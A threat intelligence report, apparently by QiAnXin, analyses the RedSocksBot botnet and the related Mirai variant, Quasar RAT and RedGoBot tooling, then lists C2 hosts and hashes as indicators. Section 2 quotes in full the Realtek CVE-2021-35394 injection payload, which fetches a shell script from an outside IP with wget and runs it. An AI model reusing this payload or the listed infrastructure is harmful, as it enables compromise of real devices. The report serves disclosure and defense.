1.Overview
In early April 2023, QiAnXin Threat Intelligence Center's threat monitoring system detected an incident of unknown family malware samples utilizing the RealTek CVE-2021-35394 vulnerability to spread. After analysis, this series of samples belonged to the same group of RedGoBot, which we have previously disclosed. Through correlation analysis, we confirmed that the group has recently begun to attempt to hide communication with C2 through socks proxy, while turning to use Tor CC.
In this article, in addition to the newly discovered zombie network samples, we will also sort out other botnets that the group has recently operated.
2. Key Behavior Analysis of Samples
The sample spreads through Realtek Jungle SDK RCE, with the following payload:
orf;cd /tmp; rm \-rf bins\.sh; wget http:*//194\.87\.197\.176/bins/bins\.sh; chmod \+x bins\.sh; sh bins\.sh; \#*
Based on the characteristics of the sample and the attribution of the group, we named this zombie network RedSocksBot. The latest binary samples supported CPU architectures as follows:
- x86-64
- PPC
- MIPS
- ARM
- SPC
- 68K
- SuperH
2.1 Killing Other Zombie Networks
Search for other processes that may be zombie networks through the Linux virtual file system for killing:
In addition, it will also search for possible Downloaders for killing:
2.2 Hiding Communication with C2 through a Proxy
Using the socks5 protocol for communication, the sample has a built-in proxy address. The following is the proxy address used in the latest version:
Using a socks5 proxy with no password authentication:
Then, RedSocksBot communicates with the hardcoded C2 through the proxy in encrypted form. The data decryption method is cyclic XOR:
In the latest version, the hardcoded C2 of RedSocksBot has changed to a dark web address:
2.3 DDoS Methods
The latest version of RedSocksBot, developed by QiAnXin, supports six DDoS attack methods, as follows:
| - |
|---|
| udp_bypass |
| openvpn |
| openvpn2 |
| tcp_stomp |
| tcp_syn |
| tcp_ack |
3. Arsenal
3.1 mirai_redbot
The group has achieved mastery in utilizing the open-source Mirai botnet. During the analysis process, analysts found that the group possessed multiple modified versions of Mirai, in addition to the usual operations of modifying keys and online packages. One of the modified versions uses AES decryption and incorporates a socks proxy in its iteration, which we have named mirai_redbot.
Its main feature is the use of the tiny-AES-c open-source and portable project from GitHub to replace the XOR decryption algorithm with an AES decryption algorithm.
Traditional Mirai uses the XOR algorithm for decryption:
Mirai_redbot uses tiny-AES-c from GitHub:
The group also modified the online package, as exemplified in one of the versions below:
In subsequent versions, the developer added a socks proxy feature:
During the update process, the C2 was also modified to a dark web address:
3.2 Quasar RAT
In addition to deploying zombie networks on Linux systems, the group has also been found to have distributed a backdoor program on Windows systems. The backdoor program is a C# program that has been obfuscated, and after analysis, was confirmed to be the Quasar RAT.
This suggests that the group is involved in other illicit activities beyond zombie networks.
3.3 RedGoBot
Furthermore, we found that the group is continuously updating RedGoBot, with the new version using GO version 1.19.
The new version slightly modified the directory for killing processes, changing "/var/run/" to "/var".
The group also reduced the number of weak password combinations for telnet brute force attacks from 64 to 2, possibly to avoid detection or being blocked by reducing the failure rate of sample brute force attacks:
A bot update command was added, but it has not been implemented yet:
4. Conclusion
Through analysis of the group's arsenal and recent update trends, it is evident that the group intends to incorporate socks proxies into their bot updates and gradually shift their CC domain names to onion domains to reduce the chances of detection. In addition to zombie networks, the group is also involved in other illicit activities. We will continue to monitor this group.
5. IOCs
RedSocksBot:
MD5:
EC866BF75A575580672C4D119986562A
E9AABD9B63DA5295ABE7623DE1653D8D
49890121A8154D1EFA0472ED72696AE2
1D3F6F716C74B1810936CD6442295AC6
C2:
158.247.223.97:443
141.164.45.139:443
139.162.76.15:443
vs2bfkss7uyv2vtvsuyxc23za327zcufannp4twbirvupap2fahifwyd.onion
mirai_redbot:
MD5:
4c51359ac1c7422083f7799eace7f8e6
C2:
broilerchickensrs.boats
gxgvoh5yljp2v2hvyiztzjhhuveaygcejp54y5gts2dnntdjexrkm2ad.onion
RedGoBot:
MD5:
9e44f040eba9b582b532fd952c7c8fd6
39a70e21e46c846b5d604ad1ef7178c0
C2:
cat-gen.cf
bot.ustress.app
62.77.157.220:6001
Quasar RAT:
MD5:
14aeb4447d6ad9d7efca5e88854261e7
C2:
mictobozo.duckdns.org